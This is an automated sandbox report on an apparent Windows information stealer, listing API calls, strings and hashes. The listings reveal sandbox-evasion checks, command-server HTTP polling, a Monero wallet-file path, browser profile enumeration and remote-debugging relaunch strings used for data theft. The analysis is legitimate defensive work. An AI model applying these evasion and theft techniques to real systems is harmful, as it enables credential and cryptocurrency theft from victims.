                            • Instruction ID: dd5f411c14d497cc87949600c29b12ce26de4050a48b1c3cf7f0440df3216d59
                            • Opcode Fuzzy Hash: 63892b7816de601d8bf02586df4e20e31643fe0071d5c3da5b094a7d12abb775
                            • Instruction Fuzzy Hash: 7612DC72910118ABCB55EB90DD62FEEB3B9AF14301F185AA9F50672091DF706B4CCFA1

                            Control-flow Graph (rendered as an image in the original report; node list summarised)
                            • Blocks e55760-e55d16: after setup at e55760-e557c7 the function enters a loop headed at e557cc; three similar stages (e557d5-e558f9, e558ff-e55aaf, e55ab5-e55c64) each issue subcalls e41590, e55440 and e55510 and compare the result against "ERROR" with StrCmpCA; from each compare one edge leads to a block calling e416b0, e41670 and e41550 that exits at e55d13-e55d16, the other continues to the next stage; after the last compare the remaining path calls Sleep(0xEA60) at e55c66-e55c71 and loops back to e557cc.
                            APIs
                              • Part of subcall function 00E5AB30: lstrlen.KERNEL32(UO,?,?,00E44F55,00E60DDF), ref: 00E5AB3B
                              • Part of subcall function 00E5AB30: lstrcpy.KERNEL32(00E60DDF,00000000), ref: 00E5AB95
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55894
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E558F1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55AA7
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E55440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55478
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E55510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55568
                              • Part of subcall function 00E55510: lstrlen.KERNEL32(00000000), ref: 00E5557F
                              • Part of subcall function 00E55510: StrStrA.SHLWAPI(00000000,00000000), ref: 00E555B4
                              • Part of subcall function 00E55510: lstrlen.KERNEL32(00000000), ref: 00E555D3
                              • Part of subcall function 00E55510: lstrlen.KERNEL32(00000000), ref: 00E555FE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E559DB
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55B90
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55C5C
                            • Sleep.KERNEL32(0000EA60), ref: 00E55C6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: a63dec0dc08e5c39754f19f0909c195a0d8e9a93d5052f94cc924a211ef88e85
                            • Instruction ID: 8d1b5f07050f576054e030e7d96547648ed4340923f406250283f7c101049ff2
                            • Opcode Fuzzy Hash: a63dec0dc08e5c39754f19f0909c195a0d8e9a93d5052f94cc924a211ef88e85
                            • Instruction Fuzzy Hash: 53E174729101049BCB58FBA0ED62EED73BDAF54301F449A78F81676085EF356A4CCB92

Control-flow Graph (rendered graph image; basic-block list not reproduced)
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 00E51A15
                            • ExitProcess.KERNEL32 ref: 00E51A21
                            Strings
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: b9a7b9f3046bddec0e7cf83d3ae814b7a796d5098d5d1ce15f78127f4074f03d
                            • Instruction ID: ec3a320dbb74260411d8e9066e9bf09c6a600b86385d73040a07129ab0f0a435
                            • Opcode Fuzzy Hash: b9a7b9f3046bddec0e7cf83d3ae814b7a796d5098d5d1ce15f78127f4074f03d
                            • Instruction Fuzzy Hash: DA519F74A08209EFCB54DF94DA44BEE77B9EF04345F105A98F812BB280E771E989CB51

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1680), ref: 00E59BF1
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1698), ref: 00E59C0A
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1530), ref: 00E59C22
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1560), ref: 00E59C3A
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1578), ref: 00E59C53
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C9888), ref: 00E59C6B
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009B7350), ref: 00E59C83
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009B7310), ref: 00E59C9C
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1590), ref: 00E59CB4
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C16B0), ref: 00E59CCC
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C15A8), ref: 00E59CE5
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C16C8), ref: 00E59CFD
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009B73B0), ref: 00E59D15
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C16E0), ref: 00E59D2E
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E411D0: ExitProcess.KERNEL32 ref: 00E41211
                              • Part of subcall function 00E41160: GetSystemInfo.KERNEL32(?), ref: 00E4116A
                              • Part of subcall function 00E41160: ExitProcess.KERNEL32 ref: 00E4117E
                              • Part of subcall function 00E41110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E4112B
                              • Part of subcall function 00E41110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E41132
                              • Part of subcall function 00E41110: ExitProcess.KERNEL32 ref: 00E41143
                              • Part of subcall function 00E41220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E4123E
                              • Part of subcall function 00E41220: __aulldiv.LIBCMT ref: 00E41258
                              • Part of subcall function 00E41220: __aulldiv.LIBCMT ref: 00E41266
                              • Part of subcall function 00E41220: ExitProcess.KERNEL32 ref: 00E41294
                              • Part of subcall function 00E56A10: GetUserDefaultLangID.KERNEL32 ref: 00E56A14
                              • Part of subcall function 00E41190: ExitProcess.KERNEL32 ref: 00E411C6
                              • Part of subcall function 00E579E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57A10
                              • Part of subcall function 00E579E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E57A17
                              • Part of subcall function 00E579E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E57A2F
                              • Part of subcall function 00E57A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57AA0
                              • Part of subcall function 00E57A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E57AA7
                              • Part of subcall function 00E57A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E57ABF
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009C97A8,?,00E610F4,?,00000000,?,00E610F8,?,00000000,00E60AF3), ref: 00E56D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E56D88
                            • CloseHandle.KERNEL32(00000000), ref: 00E56D99
                            • Sleep.KERNEL32(00001770), ref: 00E56DA4
                            • CloseHandle.KERNEL32(?,00000000,?,009C97A8,?,00E610F4,?,00000000,?,00E610F8,?,00000000,00E60AF3), ref: 00E56DBA
                            • ExitProcess.KERNEL32 ref: 00E56DC2
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 1f84693c8b396bc7eda7b4d279d542d020ccea337e8f3b57a892dc336ca0feca
                            • Instruction ID: 6cfcbfa1ad08ade7f1c76e777dec75e5b1630cba00c7649f2c9db3494efd60c1
                            • Opcode Fuzzy Hash: 1f84693c8b396bc7eda7b4d279d542d020ccea337e8f3b57a892dc336ca0feca
                            • Instruction Fuzzy Hash: 3F313431A401049BCB04F7F0DD66AEEB3B5AF04342F482E68F91276182DF706549C762

Control-flow Graph (rendered graph image; basic-block list not reproduced)
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E4123E
                            • __aulldiv.LIBCMT ref: 00E41258
                            • __aulldiv.LIBCMT ref: 00E41266
                            • ExitProcess.KERNEL32 ref: 00E41294
                            Strings
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 15a1fa3e82f4011c9b80e8caa80b5dd518219a752138210df7108a7308298071
                            • Instruction ID: f228b68b2b68b8589dfde517ee87dae8e1919a273f4becc8f44102a437d8d33a
                            • Opcode Fuzzy Hash: 15a1fa3e82f4011c9b80e8caa80b5dd518219a752138210df7108a7308298071
                            • Instruction Fuzzy Hash: C501A2B0D50308BADF10DFD0DD4AB9EB7B8EB10705F105898EA04F61C0C7B455858759

Control-flow Graph (rendered graph image; basic-block list not reproduced)
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009C97A8,?,00E610F4,?,00000000,?,00E610F8,?,00000000,00E60AF3), ref: 00E56D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E56D88
                            • CloseHandle.KERNEL32(00000000), ref: 00E56D99
                            • Sleep.KERNEL32(00001770), ref: 00E56DA4
                            • CloseHandle.KERNEL32(?,00000000,?,009C97A8,?,00E610F4,?,00000000,?,00E610F8,?,00000000,00E60AF3), ref: 00E56DBA
                            • ExitProcess.KERNEL32 ref: 00E56DC2
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: e3f4fa0a490e1801d8495daacbf66e4c3b2cf9aadbd47547216365fbeadd94a7
                            • Instruction ID: 4f88e9692e98c9a26034c6e895451de881dea8ff66546e6a5b072d7c483cbf7b
                            • Opcode Fuzzy Hash: e3f4fa0a490e1801d8495daacbf66e4c3b2cf9aadbd47547216365fbeadd94a7
                            • Instruction Fuzzy Hash: 4FF05E30A84209ABEB14BBA0DD0ABBE73B4AF14707F541D25FD22B62C4CBB05548CB51

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 628f0ff5133519215dd35aa3ef9f05a35da5fa626611d932a976d0e3dd73da58
                            • Instruction ID: 8769dc53a02a991ec3f38ff3087651b1c1b3dc93774a4225c26414465cb42c3a
                            • Opcode Fuzzy Hash: 628f0ff5133519215dd35aa3ef9f05a35da5fa626611d932a976d0e3dd73da58
                            • Instruction Fuzzy Hash: AE213EB1D00209ABDF14DFA5EC46ADE7BB5FB44321F108625F925B72D0EB706A09CB91

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E462D0: InternetOpenA.WININET(00E60DFF,00000001,00000000,00000000,00000000), ref: 00E46331
                              • Part of subcall function 00E462D0: StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E46353
                              • Part of subcall function 00E462D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46385
                              • Part of subcall function 00E462D0: HttpOpenRequestA.WININET(00000000,GET,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E463D5
                              • Part of subcall function 00E462D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E4640F
                              • Part of subcall function 00E462D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46421
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55478
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 4153b8d810f8d168ff976277ff8acbd146d311a16986e74fe780f40b74016c64
                            • Instruction ID: ee903de220cf2f343e99f84200b549bfa9587fd2dbff6004ace4b7c6192304f2
                            • Opcode Fuzzy Hash: 4153b8d810f8d168ff976277ff8acbd146d311a16986e74fe780f40b74016c64
                            • Instruction Fuzzy Hash: AA112130900108ABCB14FF64D962AED77B99F10341F445A68FD1A67492EF30AB0CC791
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57AA0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57AA7
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00E57ABF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 0ea4734d69df8b81c6aecef430886f7c56b4fff7ee4d7ace3a3245124e72a3c7
                            • Instruction ID: 9833c11ddeb4f9e99b0857061e73f754a977b643daa21a92af06c004a241a5cd
                            • Opcode Fuzzy Hash: 0ea4734d69df8b81c6aecef430886f7c56b4fff7ee4d7ace3a3245124e72a3c7
                            • Instruction Fuzzy Hash: F50162B1948249ABC714DF98D945FAFBBB8F704711F100629F955A23C0D7B45A44C7A1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E4112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E41132
                            • ExitProcess.KERNEL32 ref: 00E41143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 1ec7925c184315aab8073bee9371d7e068cc19c9fa232b6a6e3f702a138ab8f3
                            • Instruction ID: 3647b983e9a35b6a2240171dfc084328714a5e288af6858fdcf51f7dcc9eb333
                            • Opcode Fuzzy Hash: 1ec7925c184315aab8073bee9371d7e068cc19c9fa232b6a6e3f702a138ab8f3
                            • Instruction Fuzzy Hash: 6AE0CD7098530CFBEB24AB90ED0EB4CB67C9B04B05F100094F708766C0C6F425C04759
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E410B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E410F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: e3b0204290ecf936c9f73a51bd31f1dca12a80817c79777f1bbdfcde2b4520ef
                            • Instruction ID: d4ff81f6ab74e3de7c0e23f3e4ef6516028b5ec7e3e09d2fb73470f894aa2e78
                            • Opcode Fuzzy Hash: e3b0204290ecf936c9f73a51bd31f1dca12a80817c79777f1bbdfcde2b4520ef
                            • Instruction Fuzzy Hash: 9EF0E2B1641208BBEB289AA4AC59FAFF7DCE705B05F301858F901F3280D5719E408BA0
                            APIs
                              • Part of subcall function 00E57A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57AA0
                              • Part of subcall function 00E57A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E57AA7
                              • Part of subcall function 00E57A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E57ABF
                              • Part of subcall function 00E579E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57A10
                              • Part of subcall function 00E579E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E57A17
                              • Part of subcall function 00E579E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E57A2F
                            • ExitProcess.KERNEL32 ref: 00E411C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: a13a8be583bae73cd0b1ebeb3a44abf8271e07277cb3fadd1c17c1c68d6bf5a4
                            • Instruction ID: 1e96e6cf159737d7f95fb18636ea85e7045f8be0cb7495ddfdd479a602174219
                            • Opcode Fuzzy Hash: a13a8be583bae73cd0b1ebeb3a44abf8271e07277cb3fadd1c17c1c68d6bf5a4
                            • Instruction Fuzzy Hash: AFE0E2B990430253CA2473B4BE16B2A72CC5B1424FF002864FE18B2246FA25E8988666
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00E60B32,00E60B2F,00000000,?,?,?,00E61450,00E60B2E), ref: 00E4BEC5
                            • StrCmpCA.SHLWAPI(?,00E61454), ref: 00E4BF33
                            • StrCmpCA.SHLWAPI(?,00E61458), ref: 00E4BF49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4C8A9
                            • FindClose.KERNEL32(000000FF), ref: 00E4C8BB
                            Strings
                            • Preferences, xrefs: 00E4C104
                            • Brave, xrefs: 00E4C0E8
                            • \Brave\Preferences, xrefs: 00E4C1C1
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E4C3B2
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E4C495
                            • Google Chrome, xrefs: 00E4C6F8
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E4C534
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-1869280968
                            • Opcode ID: 40dd06b0e41c15979087f81173fcfe5e4dfb1a082678ce70228ce077aad1ffef
                            • Instruction ID: e9107f4ff139825f5f8290df424762eb2748b5d936e3902be123f587a4c65ca7
                            • Opcode Fuzzy Hash: 40dd06b0e41c15979087f81173fcfe5e4dfb1a082678ce70228ce077aad1ffef
                            • Instruction Fuzzy Hash: 145243725101089BCB54FB60DD96EEE73BDAF54305F445AA8F90A76181EE309B4CCFA2
                            APIs
                            • wsprintfA.USER32 ref: 00E53B1C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E53B33
                            • lstrcat.KERNEL32(?,?), ref: 00E53B85
                            • StrCmpCA.SHLWAPI(?,00E60F58), ref: 00E53B97
                            • StrCmpCA.SHLWAPI(?,00E60F5C), ref: 00E53BAD
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E53EB7
                            • FindClose.KERNEL32(000000FF), ref: 00E53ECC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 94c77efcec145c8029e82a38c1887dfb23a219cd4a594d2e2648694b27ce8f22
                            • Instruction ID: c3ff9324395e5a43c9824b67b651a4216ed77c03ac17f322d1fb2e85f3e90bad
                            • Opcode Fuzzy Hash: 94c77efcec145c8029e82a38c1887dfb23a219cd4a594d2e2648694b27ce8f22
                            • Instruction Fuzzy Hash: B3A13471A402189BDB34DF64DD85FEEB3B9BB44301F044998F91DA6185EB709B88CF61
                            APIs
                            • wsprintfA.USER32 ref: 00E54B7C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E54B93
                            • StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E54BC1
                            • StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54BD7
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E54DCD
                            • FindClose.KERNEL32(000000FF), ref: 00E54DE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 8d5081b4298b20826da89c3655b76899388c60d9aa4e8a9c1053573cc441170a
                            • Instruction ID: 62642bb20cb69d3ec419a1ef60478983a8310101a2f1207190561df719ee699e
                            • Opcode Fuzzy Hash: 8d5081b4298b20826da89c3655b76899388c60d9aa4e8a9c1053573cc441170a
                            • Instruction Fuzzy Hash: 876149B1500218ABCB34EBA0DD45FEAB37CAB48705F004598F519A61C5EB74ABC8CF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E547D0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E547D7
                            • wsprintfA.USER32 ref: 00E547F6
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E5480D
                            • StrCmpCA.SHLWAPI(?,00E60FAC), ref: 00E5483B
                            • StrCmpCA.SHLWAPI(?,00E60FB0), ref: 00E54851
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E548DB
                            • FindClose.KERNEL32(000000FF), ref: 00E548F0
                            • lstrcat.KERNEL32(?,009CF320), ref: 00E54915
                            • lstrcat.KERNEL32(?,009CE658), ref: 00E54928
                            • lstrlen.KERNEL32(?), ref: 00E54935
                            • lstrlen.KERNEL32(?), ref: 00E54946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 2855975e62d0bd74e38a224e611232480b496f69faa0d694e4cb6655d3ff488b
                            • Instruction ID: b1b8fbf8e4c30dec0debba494c072885103a1def695867c20d0f036dc3df91b9
                            • Opcode Fuzzy Hash: 2855975e62d0bd74e38a224e611232480b496f69faa0d694e4cb6655d3ff488b
                            • Instruction Fuzzy Hash: 1E5169B15402189BCB24EB70DD49FEDB37CAB58305F405998F61AA6184DB749BC8CF91
                            APIs
                            • wsprintfA.USER32 ref: 00E54113
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E5412A
                            • StrCmpCA.SHLWAPI(?,00E60F94), ref: 00E54158
                            • StrCmpCA.SHLWAPI(?,00E60F98), ref: 00E5416E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E542BC
                            • FindClose.KERNEL32(000000FF), ref: 00E542D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: c212e3e4a43508983f8b7d4c5dbd86ca37e020498f905123406dabe82988d14c
                            • Instruction ID: 7b0e798350f403ac64b982471341396fd505cd991d0d2a8de4532f30b2cae7f2
                            • Opcode Fuzzy Hash: c212e3e4a43508983f8b7d4c5dbd86ca37e020498f905123406dabe82988d14c
                            • Instruction Fuzzy Hash: D1515BB5500218ABCB24EBB0DD45EEAB37CBB58305F4049D8F61AA6184DB759BC9CF50
                            APIs
                            • wsprintfA.USER32 ref: 00E4EE3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 00E4EE55
                            • StrCmpCA.SHLWAPI(?,00E61630), ref: 00E4EEAB
                            • StrCmpCA.SHLWAPI(?,00E61634), ref: 00E4EEC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4F3AE
                            • FindClose.KERNEL32(000000FF), ref: 00E4F3C3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: 5b44df8be7ad51b797a62ae27d19d656c7bbd4d0c330a2f1be677fb50ecce461
                            • Instruction ID: cb85f6a7e28a57833ec97aa4f264399314b0986806533551c5182c8e4d815aee
                            • Opcode Fuzzy Hash: 5b44df8be7ad51b797a62ae27d19d656c7bbd4d0c330a2f1be677fb50ecce461
                            • Instruction Fuzzy Hash: AFE130729111189BDB54FB60DC62EEE7379AF54301F445AE9F80A72092EE306B8DCF91
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • API ID:
                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                            • API String ID: 0-1562099544
